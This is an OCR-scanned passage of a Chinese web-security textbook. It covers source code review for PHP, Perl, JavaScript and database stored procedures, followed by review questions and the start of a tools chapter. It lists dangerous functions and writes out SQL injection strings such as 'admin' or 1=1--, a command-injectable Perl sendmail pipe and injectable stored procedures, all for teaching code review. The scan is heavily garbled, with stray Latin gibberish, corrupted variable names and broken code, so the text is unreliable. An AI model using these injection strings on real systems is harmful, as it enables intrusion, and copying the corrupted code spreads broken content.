$sql = $db_connection->prepare { 


"SELECT * FROM users WHERE username = ? AND password = ?"); 
$sql->bind_param("ss", Susername, $password); 


$sql->execute(); 


它 生成 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = ‘admin'' or 1=1 


AND password = 'foo' 


3. 动态 代码 执行 
下 面 的 函数 可 用 于 动态 执行 PHP 人 代码: 
口 eval 
g call_user func 
DQ call_user_func_array 
g call user method 
call_ user method array 
g create_function 
分 号 分 隔 符 用 于 将 几 个 语句 连接 在 一 起 。 如 果 问 这 些 画 数 提交 用 
户 可 控制 的 数据 ， 那 么 应 用 程序 可 能 易于 受到 脚本 注入 攻击 。 

搜索 与 替代 正则 表达 式 的 preg_replace 函 数 ， 如 果 以 /e 选 项 调用 ， 
可 用 于 运行 一 段 特殊 的 PHP 代 码 。 如 果 用 户 可 控制 的 数据 出 现在 动态 
执行 的 PHP 代 码 中 ， 应 用 程序 可 能 易于 受到 攻击 。 

PHP 的 另 一 个 有 趣 的 特点 在 于 ， 它 可 以 通过 一 个 包含 函数 名 称 的 
TEJA AKZ o M, TAREKAH EEF E fun 
数 中 指定 的 函数 ; 


这 时 ， 用 户 可 以 通过 修改 func 参 数 的 值 ， 使 应 用 程序 调用 任意 一 
个 函数 〈 没 有 参数 ) 。 例 如 ， 调 用 phpinfo 函 数 将 使 应 用 程序 输出 大 量 
与 PHP 环 境 有 大 的 信息 ， 包 括 配 置 选 项 、 操 作 系 统 信息 与 扩展 。 
4. OS 命令 执行 
下 面 这 些 函 数 可 用 于 执行 操作 系统 命令 : 
口 exec 
口 passthru 
口 popen 
Dproc_open 
g shell_exec 
口 System 


口 反 单 引号 C) 

所 有 这 些 命令 都 可 以 使 用 | 字符 链接 在 一 起 。 如 有 果 未 经 过 滤 束 向 
户 可 控制 的 数据 ， 那 么 攻击 者 束 可 以 在 应 用 程序 中 执 
行 任意 命令 。 

5. URL 重 定向 

下 面 的 API 用 于 在 PHP 中 发 布 一 个 HTTP 重 定 问 : 

口 http_redirect 

口 header 

口 HttpMessage::setResponseCode 

口 HttpMessage::setHeaders 

通常 ， 使 用 http_redirect 函 数 可 以 实现 一 个 重 定 癌 ， 该 函数 接受 一 
个 包含 相对 或 绝对 UREL 的 字符 串 。 如 有 果 这 个 字符 串 的 值 由 用 户 控制 ， 
那么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

通过 调用 包含 适当 Location 消 息 头 的 header 函 数 也 可 以 实现 重 定 
问 ， 它 让 PHP 得 出 结论 ， 认 为 需要 一 个 HTTP 重 定 癌 。 例 如 : 


header ("Location: /target.php"); 


还 应 仔细 审查 setResponseCode 与 setHeaders API 的 用 法 。 如 果 某 个 
重 定向 包含 一 个 含有 HTTP Location 消息 头 的 3xx 响 应 ， 应 用 程序 就 可 
能 使 用 这 些 API 执 行 重 定向 。 

6. BES 
下 面 的 API 用 于 在 PHP 中 建立 和 使 用 网 络 套 接 字 : 
口 socket_create 
g socket_connect 
g socket_write 
g socket_send 
g socket_recv 
g fsockopen 
口 pfsockopen 
使 用 socket_create 创 建 一 个 套 接 字 后 ， 再 通过 调用 socket_connect 
与 远程 主机 建立 连接 ; 这 个 API 接 受 目标 主机 的 卫 与 端口 信息 为 参数 。 
如 采用 户 能 够 以 某 种 方式 控制 这 些 主机 信息 ， 攻 击 者 残 可 以 利用 应 用 
程序 与 任意 主机 建立 网 络 连 接 ， 无 论 这 些 主机 位 于 公共 因特网 上 、 私 
有 DMZ 中 还 是 应 用 程序 运行 的 内 部 网 络 。 


fsockopen 与 pfsockopen 函 数 可 用 于 打开 连接 指定 主机 与 端口 的 套 
接 字 ， 并 返回 一 个 可 用 在 fwrite 和 fgets 等 标准 文件 函数 中 的 文件 指针 。 
0 ， 应 用 程序 就 可 能 易于 受到 攻击 ， 如 前 

所 述 。 


19.5.4 配置 PHP 环 境 


PHP 配 置 选项 在 php.ini 文 件 中 指定 ， 该 文件 使 用 与 Windows INI X 
件 相同 的 结构 。 有 各 种 选项 都 会 影响 一 个 应 用 程序 的 安全 。 最 新 版 的 
PHP 删 除了 许多 以 前 引起 问题 的 选项 。 

1. 使 用 全 局 变量 注册 

如 果 register_globals 指 令 被 激活 ，PHP 会 为 所 有 请 求 参数 建立 全 局 
变量 。 如 果 PHP 不 要 求 变 量 在 使 用 前 被 初始 化 ， 这 个 选项 束 会 导致 安 
全 漏洞 ， 使 攻击 者 能 够 将 一 个 变量 初始 化 为 任意 一 个 值 。 

例如 ， 下 面 的 代码 检查 一 名 用 户 的 证 书 ， 如 果 证 书 有 效 ， 就 将 


$authenticated 变 量 值 设 为 1: 


if (check_credentials(Susername, $password) ) 
{ 


Sauthenticated = 1; 


if (Sauthenticated) 


"m 


为 最 初 PHP 没 有 将 $authenticated 变 量 明 确 地 初始 化 为 0， 攻 击 者 
束 可 以 通过 提交 请 求 参数 authenticated=1 避 开 登 录 。 这 使 PHP 在 进行 证 
书 检查 之 前 就 将 全 局 变量 $authenticated 设 为 1 。 


T 注解 从 PHP 4.2.0 开 始 ，register_globals 指 令 默 认 被 禁 


然而 ， 由 于 许多 老式 应 用 程序 依赖 于 register_globals 执 行 的 正常 操 
作 ， 因 此 ， 通 常 php.ini 会 明确 激活 该 指令 。PHP 6 完全 删除 了 
register_globals 指 令 。 


2. 安全 模式 

如 果 safe_mode 指 令 被 激活 ， 那 么 PHP 会 对 使 用 某 些 危险 的 函数 施 
加 限制 。 一 些 函 数 被 完全 禁用 ， 其 他 一 些 函 数 的 使 用 也 受到 限制 ， 如 
下 所 示 。 

口 shell_exec 芳 数 被 禁用 ， 因 为 这 个 函数 可 用 于 执行 操作 系统 命 
Aes 

口 mail 函 数 的 additional_parameters 参 数 被 禁用 ， 因 此 ， 如 果 以 不 
安全 的 方式 使 用 这 个 参数 ， 可 能 导致 SMTP 注 入 漏洞 (请 参阅 第 10 章 
了 解 相关 内 容 ) 。 

g exec FRAN REM HT safe_mode exec_ dir 指定 目标 下 的 可 执行 程 
序 ， 命 令 字 符 串 中 的 元 字符 被 目 动 转 义 。 


TZ ER 并 非 所 有 的 危险 画 数 都 受到 安全 模式 的 限制 ， 一 些 
限制 受到 其 他 配置 选项 的 影响 。 而 且 ， 有 各 种 方法 可 以 避 开 一 些 安 


全 模式 限制 。 安 全 模式 并 不 能 完全 解决 PHP 应 用 程序 中 的 安全 问 
题 。PHP 6 已 删除 安全 模式 。 


3. magic quotes 

如 果 激 活 magic_quotes_gpc 指 令 ， 那 么 请 求 参数 中 包含 的 任何 单 引 
号 、 双 引号、 有 反 和 斜 线 和 空 字符 都 会 用 一 个 反 斜 线 自 动 转 义 。 如 果 
magic_quotes_sybase 指 令 被 禁用 ， 那 么 PHP 束 会 用 一 个 单 引 号 转 义 所 
有 单 引 号 。 这 个 选项 由 在 保护 包含 不 安全 的 数据 库 调 用 的 危险 代码 ， 
以 防 它 被 恶意 的 用 户 输入 利用 。 在 应 用 程序 的 代码 中 碍 找 SQL 注 入 漏 
洞 时 ， 应 该 检查 magic quotes 是 否 被 激活 ， 因 为 它 会 影响 应 用 程序 处 理 
输入 的 方式 。 

使 用 magic quotes 并 不 能 防止 所 有 SQL 注入 攻击 。 如 第 9 章 所 述 ， 
注入 一 个 数字 字段 的 攻击 并 不 需要 使 用 单 引 号 。 而 且 ， 如 果 其 中 包含 
的 引号 没有 被 转 义 的 数据 随后 又 从 数据 库 中 读 回 ， 那 么 仍 可 以 利用 这 
些 数据 实施 二 阶 攻击 。 

在 不 需要 任何 转 义 的 情况 下 处 理 数 据 时 ， 油 省 magic quotes 选 项 可 
能 会 使 PHP 对 用 户 输入 进行 不 必要 的 修改 ， 导 致 代码 中 多 出 斜 线 ， 还 
要 使 用 stripslashes 函 数 删 除 。 


在 必要 时 ， 一 些 应 用 程序 通过 addslashes 函 数 提 交 参 数 ， 目 行 对 相 
关 输 入 进行 转 义 。 如 果 PHP 配 置 激活 了 magic quotes， 那 么 这 种 方法 就 
会 导致 双重 转 义 字符 ， 这 时 束 会 将 配对 的 斜 线 解 释 为 字面 量 反 斜 线 ， 
潜在 恶意 字符 不 会 转 义 。 

由 于 magic quotes 选 项 的 局 限 性 与 不 规则 性 ， 建 议 禁 用 该 选项 ， 使 
用 预 处 理 语句 安全 访问 数据 库 。 


™/ 注解 PHP 6 已 删除 magic quotes 选 项 。 


4. 其 他 
表 19-10 列 出 了 其 他 一 些 可 能 影响 PHP 应 用 程序 安全 的 配置 选项 。 


表 19-10 ”其 他 PHP 配 置 选项 


选 项 fH uè 
SE ee 如 果林 用， 该 指令 阻止 一 些 文件 函数 访问 远程 文件 
OPEN (如 前 文 所 壕 ，) 
如 有 果 禁 用 ， 该 指令 阻止 PHP 文 件 包含 画 数 用 于 包含 
一 个 远程 文件 
如 果林 用， 该 指令 阻止 PHP 回 用 户 浏览 器 发 送 错误 
display_errors 消息 。log_errors 与 error log 选项 
可 在 服务 器 上 记录 错误 消息 ， 以 方便 诊断 错误 
该 指令 将 导致 PHP 人 允许 通过 HTTP 上 传 
f 


allow_url_include 


file_uploads 


AAHS o H THEAT ERIR HK e 
upload_tmp_dir ”该 指令 确保 不 会 将 敏感 文件 保存 在 任何 
用 户 都 可 访问 的 位 置 


19.6 Perl 


本 节 主 要 介绍 在 Perl 乎 台 上 获取 用 户 提交 的 输入 的 方法 、 与 用 户 
` 存在 的 洪 在 危险 的 API 以 及 与 平台 安全 相关 的 配置 
选项 。 

众所周知 ，Penl 语 言 允 许 开 发 者 以 各 种 方式 执行 相同 的 任务 。 而 
且 ， 有 大 量 Perl 模 块 可 满足 不 同 的 需求 。 如 采 Perl 使 用 任何 不 闻 见 的 或 
所 有 权 模 块 ， 应 对 这 些 模块 进行 仔细 审查 ， 确 定 它们 是 否 使 用 了 任何 
强大 的 或 危险 的 函数 ， 从 而 引入 应 用 程序 直接 使 用 这 些 函 数 时 引入 的 
相同 漏洞 。 

CGIpm 是 最 单 用 于 创建 Web 应 用 程序 的 Pen 模块 ， 当 对 用 Pen 编写 
的 Web 应 用 程序 进行 代码 审查 时 ， 很 可 能 遇 到 这 个 模块 所 使 用 的 API 。 


19.0.1 用 户 
表 19-11 列 出 了 CGI 查询 对 象 的 全 部 成 员 。 


表 19-11 用 于 获取 用 户 提交 的 数据 的 CGI 查询 成 员 


选 项 描 m 
param 如 果 调 用 时 不 使 用 参数 ，param 返 回 请 求 中 所 有 参数 


param_fetch 名 称 的 列表 
J 用 时 使 用 参数 名 称 ，param 返 回 该 请 求 参 数 的 


param_fetch 方 法 返回 一 个 命名 参数 数组 


Vars 它 返回 参数 名 称 与 值 之 间 的 散 列 映射 
cookie 使 用 cookie 函 数 可 设 定 和 检索 一 个 命名 cookie 的 值 


raw_cookie raw_cookie Ex 312 回 HITTP Cookie 消 息 头 的 全 部 内 
容 ， 但 不 进行 任何 解析 

self_url HE RSC] 4 AURL, Aaa BSS 

url 

query_string ”这 个 函数 返回 当前 请 求 的 查询 字符 串 


referer 这 个 函数 返回 HTTP Refere ACHE 
request_method 这 个 函数 返回 请 求 中 使 用 的 HTTP 方法 

user_agent 这 个 函数 返回 HTTP User_agent 消 息 头 的 值 

http 这 些 函 数 返 回 当 前 请 求 中 的 所 有 HTTP 环 境 变 量 列表 
https 


ReadParse 这 个 函数 返回 一 个 名 为 %in 的 数组 ， 其 中 包含 所 有 请 
求 参 数 的 名 称 与 值 


19.6.2 “会话 交互 


Per 模块 CGISession.pm 对 模块 CGI.pm 进 行 扩展 ， 为 会 话 追 踩 与 数 
据 存储 提供 支持 。 例 如 : 


print “Welcome * . $q->session_data(*MyName"); // retrieve user's name 
y, 
19.6.3 蕊 | 从 HAPI 


这 一 节 介 绍 一 些 常见 的 Perl API。 以 危险 的 方式 使 用 这 些 API 可 能 
会 造成 安全 漏洞 。 

1. 文件 访问 

Perl 使 用 下 面 的 API 访 问 文件 : 

口 open 

g sysopen 

open 函 数 用 于 读 取 或 写 入 指定 文件 的 内 容 。 如 果 以 文件 名 参数 提 
J 攻击 者 就 可 以 访问 服务 器 文件 系统 上 的 任意 文 

另外 ， 如 果 文 件 名 参数 的 开头 或 结尾 为 管道 符 (|) ， 那 么 这 个 参 
数 的 内 容 被 提交 给 一 个 shell 命 令 。 如 果 攻 击 者 能 够 注入 包含 管道 从 或 
分 号 之 类 的 shell 元 字符 的 数据 ， 那 么 他 们 就 可 以 执行 任意 命令 。 例 
如 ， 在 下 面 的 代码 中 ， 攻 击 者 可 以 注入 $useraddr 参 数 ， 以 执行 系统 命 


aie 


Suseraddr = Squery->param({"useraddr") ; 
open (MAIL, "| /usr/bin/sendmail $useraddr") ; 
print MAIL "To: Suseraddr\n"; 


2. 数据 库 访 问 

selectall_arrayref 芳 数 用 于 问 数 据 库 发 送 一 个 查询 ， 并 以 一 系列 数 
组 的 形式 检索 查询 结果。do 函 数 用 于 执行 一 个 查询 ， 并 返回 受 影响 的 
行 的 数量 。 在 这 两 个 函数 中 ，SQL 语 句 以 一 个 简单 的 字符 串 提 交 。 

如 果 用 户 可 控制 的 数据 属于 字符 串 参 数 的 一 部 分 ， 那 么 应 用 程序 
残 可 能 容易 受到 SQL 注入 攻击 。 例 如 : 


my Susername = “admin' or i-1--"; 
my $password = "foo"; 
my $sql-"SELECT * FROM users WHERE username = ‘Susername' AND password = 
‘Spassword'"; 
my $result = $db connection->selectall arrayref ($sql) 
个 7 了 7 全 j= Ay 
已 会 执行 不 民 查 询 : 
SELECT * FROM users WHERE username = ‘admin' or i=1--' 
AND password = 'foo' 


prepare Jj execute K Zt A) H Bi TU EA, TRAP RAE 
一 个 包含 参数 占 位 符 的 SQL 查询 ， 并 以 可 靠 而 且 类 型 安全 的 方式 设 定 
这 些 占 位 符 的 值 。 如 果 按 正常 的 方式 使 用 ， 这 种 机 制 就 不 易 受 到 SQL 
注入 攻击 。 例 如 : 


my Susername = "admin' or 1=1--"; 
my S$password = "foo"; 
my $sql = $db_connection->prepare("SELECT * FROM users 


WHERE username = ? AND password = ?"); 
$sql->execute($username, $password) ; 


它 生成 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = ‘admin'' or 1=1--' 
AND password = 'foo' 


3. 动态 代码 执行 


eval 可 用 于 动态 执行 包 仿 Perl 代码 的 字符 串 。 分 号 分 隅 符 用 于 将 几 
个 语句 连接 在 一 起 。 如 果 辐 这 个 函数 提交 用 户 可 控制 的 数据 ， 那 么 应 
用 程序 可 能 易 于 受到 脚本 注入 攻击 o 


4. OS 命令 执行 

下 面 这 些 函 数 可 用 于 执行 操作 系统 命令 : 
口 System 
g exec 


Ly qx 
口 反 单 引号 C) 

所 有 这 些 命令 都 可 以 使 用 | 字符 链接 在 一 起 。 如 果 未 经 过 滤 就 回 
AEEA AY ae 攻击 者 就 可 以 在 应 用 程序 中 执行 任 
ja OES e 

5. URL 重 定向 

CGI 查询 对 象 成 员 之 一 的 redirect 函 数 接受 一 个 包含 相对 或 绝对 
UREL 的 字符 串 ， 用 户 被 重 定 同 到 该 URL。 如 果 这 个 字符 串 的 值 由 用 户 
控制 ， 那 么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

6. BRS 

使 用 socket 创 建 一 个 套 接 字 后 ， 再 通过 调用 connect 在 它 与 远程 主 
机 之 间 建 立 连 接 ，connect 函 数 接受 由 目标 主机 的 卫 与 端口 信息 组 成 的 
sockaddr_ in 结构 。 如 果 用 户 能 够 以 某 种 方式 控制 这 些 主机 人 信息， 攻击 

者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 ， 无论 这 些 主机 位 于 
因特网 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 


19.6.4 ”配置 Perl 环 境 
Perl 提 供 一 个 污染 模式 ， 防 止 用 户 提交 的 输入 被 传送 给 并 在 危险 


的 函数 。 通 过 以 下 方式 癌 Pen 解 释 居 提交 -T 标 记 ， 可 在 污染 模式 下 执 
行 Perl 程 序 。 


oOo 


#!/usr/bin/perl -T 
SET REP ETS BES PIS (TY, PRP RES ERTS AANE 
的 每 一 个 输入 ， 并 把 它 当 做 被 污染 的 输入 处 理 。 如 果 男 一 个 变量 根据 
一 个 受 污染 的 数据 分 配 它 的 值 ， 那 么 Perl 也 认为 它 受 到 污染 。 例 如 : 


Sfull_path = Spath.$filename; # $full_path now tainted 
不 能 将 污染 的 变量 提交 给 一 系列 功能 强大 的 命令 ， 包 括 eval 、 

system、exec 与 open。 要 在 敏感 操作 中 使 用 污染 的 数据 ， 束 必 须 执行 
一 项 模式 匹配 操作 并 提取 匹配 的 子 字 符 串 , “清洁 ”这 些 数据 。 例 如 : 


Sfull_path =~ m/*({la-zA-21-9)+)$/; # match alphanumeric submatch 


# in $full_path 


Sclean_full_path = $1; # set $clean_full_path to the 
# first submatch 
# Scliean_full_path is untainted 


虽然 污染 模式 机 制 旧 在 防止 许多 类 型 的 漏洞 ， 但 只 有 当 开 发 者 使 
用 适当 的 正则 表达 式 从 被 污染 的 输入 中 提取 “清洁 ”的 数据 时 它 才 会 有 
效 。 如 采 一 个 表达 式 的 范围 过 于 宽 沁 ， 并 提取 了 使 用 时 可 能 引起 问题 
的 数据 ， 那 么 污染 模式 提供 的 保护 束 会 失效 ， 应 用 程序 仍然 易于 受到 
攻击 。 实 际 上 ， 污 染 模式 被 当做 一 种 提醒 机 制 ， 它 告诉 程序 员 在 危险 
操作 中 使 用 输入 的 数据 前 ， 必 须 对 所 有 输入 进行 适当 确认 。 它 不 能 保 
证 所 实施 的 输入 确认 已 经 足够 全 面 。 


19.7 JavaScript 


由 于 客户 端 JavaScript 不 需要 任何 应 用 程序 访问 权限 即 可 访问 ， 因 
此 ， 任 何 时 候 都 可 以 执行 以 安全 为 中 心 的 代码 审查 。 这 类 审查 的 关键 
在 于 确定 客户 端 组 件 中 的 所 有 漏洞 ， 如 基于 DOM 的 XSS， 它 们 使 用 户 
易于 受到 攻击 〈 请 参阅 第 12 章 了 解 相关 内 容 ) 。 审 查 JavaScript 的 另 一 
个 原因 是 ， 这 样 做 有 助 于 了 解 客户 端 实施 了 哪些 输入 确认 ， 以 及 动态 
生成 的 用 户 界 面 的 结构 。 

当 审查 JavaScript 代 码 时 ， 必 须 确保 检查 .js 文件 和 在 HTML 内 容 中 
舱 入 的 脚本 。 

需要 重点 审查 的 是 那些 读 取 基 于 DOM 的 数据 以 及 写 入 或 以 其 他 方 
式 修改 当前 文档 的 API， 如 表 19-12 所 示 。 


表 19-12 ” 读 取 基于 DOM 数 据 的 JavaScript API 


API 描 ot 
document.location 这 些 API 可 用 于 访问 通过 专门 设计 的 URL 控 
document.URL 制 的 DOM 数 据 ， 而 攻击 者 
document.URLUnencoded 可 回 它 们 提交 专门 设计 的 数据 ， 攻 击 其 他 
document.referer 应 用 程序 用 户 
window.location 
document.write() 这 些 API 可 用 于 更 新 文档 的 内 容 并 动态 执行 
document.writeln() JavaScript 代 码 。 如 果 问 这 些 
document.body.innerHtml API 提 交 攻 击 者 可 控制 的 数据 ， 他 就 可 以 在 
eval() 受害 者 的 浏览 右 中 执行 任意 
window.execScript() JavaScript} thy 
window.setInterval() 


window.setTimeout() 


19.8 组 


如 今 ，Web 应 用 程序 已 不 仅仅 使 用 数据 库 实 现 数据 存储 。 今 天 的 
数据 库 包含 丰富 的 编程 接口 ， 可 在 数据 库 层 执行 大 量 的 业务 逻辑 。 开 
发 者 频繁 使 用 数据 库 代 码 组 件 〈 如 存储 过 程 、 和 触发 器 和 用 户 定义 的 范 
数 ) 完成 各 种 关键 任务 。 因 此 ， 当 审查 一 个 Web 应 用 程序 的 源 代 码 
时 ， 必 须 将 数据 库 中 执行 的 所 有 逻辑 包括 在 审查 范围 之 内 。 

数据 库 代 码 组 件 中 的 编程 错误 可 能 会 导致 本 章 摘 述 的 各 种 安全 漏 
洞 。 但 现实 操作 中 应 当 留 意 两 种 主要 的 漏洞 。 首 先 ， 数 据 库 组 件 目 身 
可 能 包含 SQL 注入 漏洞 ;其 次 ， 用 户 输入 可 能 会 以 危险 的 方式 提交 给 
潜在 危险 的 函数 。 


19.8.1 SQL 注入 


第 9 章 介 绍 了 如 何 使 用 预 处 理 语 名 代替 动态 SQL 语句 ， 以 防止 SQL 
注入 攻击 。 然 而 ， 即 使 在 整个 Web 应 用 程序 代码 中 正确 使 用 预 处 理 语 
句 ， 如 采 数 据 库 代码 组 件 以 危险 的 方式 使 用 用 户 提交 的 输入 构造 查 
询 ，SQL 注 入 漏洞 也 依然 存在 。 

下 面 以 一 个 @name 参 数 易于 受到 SQL 注 入 的 存储 过 程 为 例 : 


ATIC PROCEDURE snow CUrrent orOers 
3 00} N 
AS 
JR RE @sal £000} 
SELECT @sql ELECT id_num, archst F re 1 HERE 
rchstring = @name + ''''; 
EXEC sql} 


即使 应 用 程序 将 用 户 提交 的 name 值 安全 传送 给 存储 过 程 ， 该 过 程 
本 吴 也 会 直接 把 这 个 值 连接 到 一 个 动态 碍 询 中 ， 因 此 它 易 于 受到 攻 
I= 


不 同 的 数据 库 平 台 使 用 不 同 的 方法 动态 执行 包 售 SQL 语 句 的 字符 
R, A FETZ e 

O MS-SQL: EXEC 

g Oracle: EXECUTE IMMEDIATE 

口 Sybase: EXEC 


口 DB2: EXEC SQL 

应 对 出 现在 数据 库 代 码 组 件 中 的 这 些 表达 式 进 行 仔细 审查 。 如 采 
eT a 于 构建 SQL 字符 串 ， 应 用 程序 可 能 易于 受到 SQL 
EAD” 


T 注解 在 Oracle 中 ， 存 储 过 程 默认 在 定义 者 权限 而 非 调用 者 


权限 下 运行 (与 UNIX 中 的 SUID 程 序 相同 ) 。 因 此 ， 如 果 应 用 程序 
使 用 一 个 低 权 限 账户 访问 数据 库 ， 并 且 使 用 DBA 账 户 建立 存储 过 


程 ， 那 么 攻击 者 整 可 以 利用 某 个 过 程 中 存在 的 SQL 注 入 漏洞 提升 目 
己 的 权限 ， 并 执行 任意 数据 库 查 询 。 


存储 过 程 之 类 的 定制 代码 组 件 常用 于 执行 不 常见 的 或 功能 强大 的 
操作 。 如 果 以 不 安全 的 方式 回 一 个 潜在 危险 的 函数 传送 用 户 提 区 的 数 
据 ， 那 么 根据 该 函数 的 功能 ， 这 样 做 可 能 会 导致 各 种 类 型 的 漏洞 。 例 
as ， 下 面 的 存储 过 程 的 @loadfile 与 @loaddir 参 数 束 易于 受到 命令 注入 
攻击 。 


slect @cmåstring = *S$PATH/firstload " + @leadfile + " " + @loaddir 


Ena 


WRORREA TEVA, RR ENA A) Bee fake ° 

口 MS-SQL 与 Sybase 中 功能 强大 的 存储 过 程 ， 使 用 它们 可 执行 命令 
问 注 册 表 等 。 

口 用 于 访问 文件 系统 的 函数 。 

口 连 接 到 数据 库 以 外 的 库 的 用 户 定 义 的 函数 。 

口 可 访问 网 络 的 函数 ; 例如， 通过 MS-SQL 中 的 OpenRowSet 或 
Oracle 中 的 数据 库 链 接 。 


at 


se 
ot 


19.9 1 a3 


到 目前 为 止 ， 我 们 描述 的 代码 审查 方法 大 多 要 求 阅 读 源 代码 ， 并 
a SU abe 危险 的 API 的 模式 。 因 此 ， 为 
进行 有 效 的 代码 审查 ， 最 好 使 用 一 球状 能 工具 浏览 代码 ， 也 就 古 说 ， 
该 工具 外 g 够 理解 各 种 语言 使 用 的 代码 结 义 ， 提 供与 特定 API 和 表达 式 
有 天 的 上 下 文 信息 ， 并 能 够 方便 地 进行 导航 。 


在 许多 语言 中 ， 可 以 使 用 某 种 开发 工作 室 ， 如 Visual Studio ` 
NetBeans 或 Eclipse ° 还 有 各 种 一 般 性 的 代码 浏览 工具 ， 它们 支持 各 种 
语言 ， 并 且 可 进行 优化 ， 以 方便 阅读 代码 。Source Insight 是 我 们 百 选 
的 工具 ， 如 图 19-1 所 示 。 它 支持 源 代 码 树 浏览 ， 拥 有 强大 的 搜索 功 
能 ， 使 用 一 个 预览 框 显示 与 任何 选中 的 表达 式 有 关 的 上 下 文 信息 ， 并 

能 够 在 代码 之 间 快 速 导航 。 
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19-1 使 用 SourceInsight 搜 索 和 浏览 某 个 Web 应 用 程序 的 源 代码 


19.10 “小结 


许多 在 测试 Web 应 用 程序 方面 拥有 实际 经 验 的 人 ， 对 于 审查 一 个 
应 用 程序 的 代码 并 直接 从 中 发 现 漏洞 ， 往 往 表现 出 不 合 和 常理 的 念 惧 。 
对 于 那些 没 做 过 程序 员 的 人 而 言 ， 产 生 这 种 念 惧 是 可 以 理解 的 ， 但 这 
种 表现 并 没有 合理 的 根据 。 任 何 熟 悉 计 算 机 的 人 ， 只 要 花 一 点 儿 投 
次， 就 可 以 拥有 足够 的 知识 与 信心 ， 进 行 有 效 的 代码 审查 。 当 审查 一 
个 应 用 程序 的 代码 时 ， 不 一 定 要 发 现 其 中 包含 的 “全 部 ”漏洞 ， 任 何人 
在 杀手 进行 测试 时 都 不 会 设 定 这 个 不 现实 的 目标 。 更 合理 的 做 法 是 ， 
着 手 了 解 应 用 程序 对 用 户 提交 的 输入 进行 了 哪些 关键 的 处 理 ， 认 清 一 
些 表示 应 用 程序 可 能 存在 漏洞 的 签名 。 这 样 ， 代 码 审 查 才 可 以 与 大 家 
更 加 熟悉 的 “复合 ”测试 方法 互 为 补充 ， 提 高 “墨盒 " 测 弃 的 效率 ， 并 氢 
露 完 全 从 外 部 访问 应 用 程序 时 非常 难以 发 现 的 漏洞 。 


19.11 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.netwahh。 
(1) 列 出 3 种 可 在 源 代码 中 找到 明确 签名 的 常见 漏洞 。 
2 (2) 当 审 查 PHP 应 用 程序 时 ， 为 什么 有 时 很 难 确 定 用 户 输入 的 所 
来 源 ? 
(3) 以 下 两 个 执行 SQL 查 询 的 方法 都 使 用 了 用 户 提交 的 输入 : 


// method 1 


String artist = request.getParameter(*artist"}.replaceAll{"'*, "''" 
String genre = request.getParameter ("genre"). replaceAll("'", "''"); 
String album request .getParameter("“album").replaceAlLL("'", "''*" 


Statement s = connection.createStatement {); 
s.executeQuery ("SELECT * FROM music WHERE artist = '" + artist + 
* AND genre = '* + genre + '* AND album = '" + album + "*'"); 


// method 2 
String artist = request.getParameter ("artist"); 
String genre request .getParameter ("genre"); 


ring album = request.getParameter({"album"); 


ah 
i= 
Statement s = connection.prepareStatement ( 
"SELECT * FROM music WHERE artist = '" + artist + 
"1 AND genre = ? AND album = ?"); 


s.setString(1, genre); 
s.setString(Z2, album); 
s.executeQuery(); 


哪 一 个 方法 更 加 安全 ， 为 什么 ? 

(4) 在 审查 一 个 Java 应 用 程序 代码 时 ， 首 先 要 检查 
HttpServletRequest.getParameter API 的 所 有 用 法 。 下 列 代 码 引 起 了 你 的 
注意 : 

private void setWelcomeMessage(NttpServletRequest request} throws 

ServletException 


{ 


String name = request.cetParameter ("name"); 


if {mame == null) 
name = " 


m_welcomeMessage = “Welcome * + name +"!"; 


这 段 代 码 表 示 应 用 程序 中 可 能 存在 什么 漏洞 ? 还 需要 进行 哪些 代 
码 分 析 才 能 确定 应 用 程序 是 否 确实 易于 受到 攻击 ? 
(5) 假设 渗透 测试 员 正 在 审查 一 个 应 用 程序 用 于 生成 会 话 令 牌 的 
机 制 。 相 关 代 码 如 下 : 


public class TokenGenerator 


private java.util.Random r = new java.util.Random(); 
public synchronized long nextToken{) 
{ 


long 1 = r.nextInt(); 


long m = r.nextInt(}; 
return 1 + (m << 32); 
} 


应 用 程序 生成 的 会 话 令 牌 是 否 可 以 预测 ? 请 解释 理由 。 


第 20 章 
Web)» T 工具 包 


只 需要 使 用 一 个 标准 的 Web 浏 览 器 即 可 实施 一 些 针对 Web 应 用 程 
序 的 攻击 ， 然 而 ， 绝 大 多 数 攻击 要 求 使 用 其 他 一 些 工具 。 许 多 这 样 的 
工具 需要 与 浏览 器 组 合 在 一 起 使 用 ， 以 扩展 的 形式 修改 浏览 器 自身 的 
功能 ， 或 者 作为 外 部 工具 与 浏览 器 同时 运行 ， 并 修改 它 与 目标 应 用 程 
序 的 交互 。 

黑客 工具 包 中 最 重要 的 工具 属于 后 者 ， 它 作为 Web 拦 截 代理 服务 
器 运行 ， 人 允许 查看 并 修改 浏览 器 与 目标 应 用 程序 之 间 传 送 的 所 有 HTTP 
消息 。 近 些 年 来 ， 基 本 的 拦截 代理 服务 器 已 经 发 展 成 为 功能 强大 的 集 
成 工具 套件 ， 拥 有 大 量 旨 在 帮助 黑客 攻击 Web 应 用 程序 的 功能 。 本 章 
将 介绍 这 类 工具 的 作用 原理 ， 并 说 明 如 何 充分 利用 它们 的 功能 。 

第 二 类 主要 的 工具 为 Web 应 用 程序 扫描 器 。 这 种 产品 旨 在 将 攻击 
Web 应 用 程序 过 程 中 的 许多 任务 自动 化 ， 酒 盖 初步 解析 一 直到 探查 漏 
洞 等 过 程 。 我 们 将 分 析 Web 应 用 程序 扫描 器 的 内 在 优 缺 点 ， 并 简要 介 
绍 这 个 领域 内 几 款 当前 市 场 领先 的 产品 。 

最 后 ， 还 有 很 多 定制 的 小 型 工具 都 可 在 测试 Web 应 用 程序 时 执行 
特定 的 任务 。 虽 然 渗透 测试 员 可 能 只 是 偶尔 使 用 这 些 工具 ， 但 事实 证 
明 ， 在 特殊 情况 下 ， 它 们 极其 有 用 。 


20.1 Web 浏览 器 


Web 浏 览 右 其 实 并 不 是 一 种 攻击 工具 ， 而 是 访问 Web 应 用 程序 的 
标准 方法 。 然 而 ， 在 攻击 Web 应 用 程序 时 ， 渗 透 测 试 员 选 择 的 Web 浏 
览 硕 会 影响 攻击 效率 。 此 外 ， 还 有 各 种 针对 不 同类 型 浏览 磊 的 扩展 可 
° 本 市 将 简要 介绍 3 种 流行 的 浏 贤 絮 以 及 它们 

= o 


20.1.1 Internet Explorer 


